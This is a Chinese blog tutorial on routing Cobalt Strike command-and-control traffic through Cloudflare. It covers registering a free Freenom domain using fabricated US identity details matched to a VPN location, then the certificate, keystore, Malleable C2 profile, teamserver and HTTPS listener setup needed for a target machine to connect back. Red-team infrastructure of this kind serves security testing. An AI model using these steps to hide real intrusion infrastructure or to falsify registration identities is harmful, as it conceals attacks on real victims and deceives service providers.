cobalt strike cdn上线笔记
1、打开freenom进行新域名注册,先输入想要注册的域名,再检查其可用性。
2、点击完成,修改Period为12个月,更长时间就需要付费。
3、进入账号注册页面,这里需要挂VPN,可以选择谷歌账号登录或者通过其他邮箱注册。
4、邮箱会收到freenom发来的确认邮件,点击邮件内容中的链接来到资料填写页面。
5、由于填写的资料需与当前网络信息一致,可以先查询当前VPN的IP归属地(做好是美国),再使用好维持(http://www.haoweichi.com/
)生成美国人虚拟信息,州全称也需和IP归属的州名称一致。
6、根据虚拟信息填写对应资料,提交出现以下页面则注册成功。
二、CDN注册1、
打开cloudflare(https://dash.cloudflare.com)进行账号注册,注册成功直接添加freenom注册的免费域名。
2、选择免费计划。
3、添加DNS解析记录。
4、复制Cloudflare名称服务器地址。
5、登录freenom,打开My Domains->ManageDomain->Management Tools->Nameservers,选择
Usecustom nameservers (enter below),填写名称服务器。
6、自动配置全部选择关闭
7、概述显示“好消息!Cloudflare 正在保护您的站点”则配置成功。
三、cobalt strike https上线1、打开Cloudflare,配置SSL/TLS加密模式为完全。
2、配置缓存,开启AlwaysOnline及开发模式。
3、打开SSL/TLS的源服务器创建源证书。
4、创建使用Cloudflare生成私钥和CSR,复制出源证书及私钥,保存为server.pem和server.key文件。
5、使用以下命令重新生成store格式配置文件。
1.生成.p12格式文件openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name 域名 -passout pass:密码
例子:
openssl pkcs12 -export -in server.pem -inkey server.key -out spoofdomain.p12 -name zh.xxxxx.tk -passout pass:pasa12342.生成.store格式文件
keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias 域名
例子:
keytool -importkeystore -deststorepass pasa1234 -destkeypass pasa1234 -destkeystore cs.store -srckeystore spoofdomain.p12 -srcstoretype PKCS12 -srcstorepass pasa1234 -alias zh.xxxxx.tk
6、C2.profile配置
使用以下项目
https://github.com/rsmudge/Malleable-C2-Profiles
在profile文件中添加以下配置。
https-certificate {set keystore " cs.store ";set password "pasa1234";}
7、使用c2lint工具检测profile文件是否可用。不发生报错则可用。
./c2lint havex.profile
8、修改teamserver配置文件
javax.net.ssl.keyStore=./cs.store路径 -Djavax.net.ssl.keyStorePassword=证书密码
例子:
javax.net.ssl.keyStore=./cs.store -Djavax.net.ssl.keyStorePassword=pasa1234
9、启动cobalt strike
./teamserver 服务器IP 密码 ./ havex.profile文件路径./teamserver 192.168.1.1 mimatest ./ havex.profile
10、配置https监听器
Cloudflare只支持监听以下端口:
Cloudflare支持的HTTP端口是:80,8080,8880,2052,2082,2086,2095Cloudflare支持的HTTPs端口是:443,2053,2083,2087,2096,8443如果VPS是国内云主机,且注册的免费域名没有备案,则不能使用80、8080、443、8443端口提供服务。以下使用的是2096端口。
11、生成一个Stageless Payload,勾选启用https。
12、目标靶机执行,成功https上线。
往期回顾01Java安全-01反射02使用goby检测log4j漏洞03小程序测试流相关阅读
-
世界热推荐:今晚7:00直播丨下一个突破...
今晚19:00,Cocos视频号直播马上点击【预约】啦↓↓↓在运营了三年... -
NFT周刊|Magic Eden宣布支持Polygon网...
Block-986在NFT这样的市场,每周都会有相当多项目起起伏伏。在过去... -
环球今亮点!头条观察 | DeFi的兴衰与...
在比特币得到机构关注之后,许多财务专家预测世界将因为加密货币的... -
重新审视合作,体育Crypto的可靠关系才能双赢
Block-987即使在体育Crypto领域,人们的目光仍然集中在FTX上。随着... -
简讯:前端单元测试,更进一步
前端测试@2022如果从2014年Jest的第一个版本发布开始计算,前端开发... -
焦点热讯:刘强东这波操作秀
近日,刘强东发布京东全员信,信中提到:自2023年1月1日起,逐步为...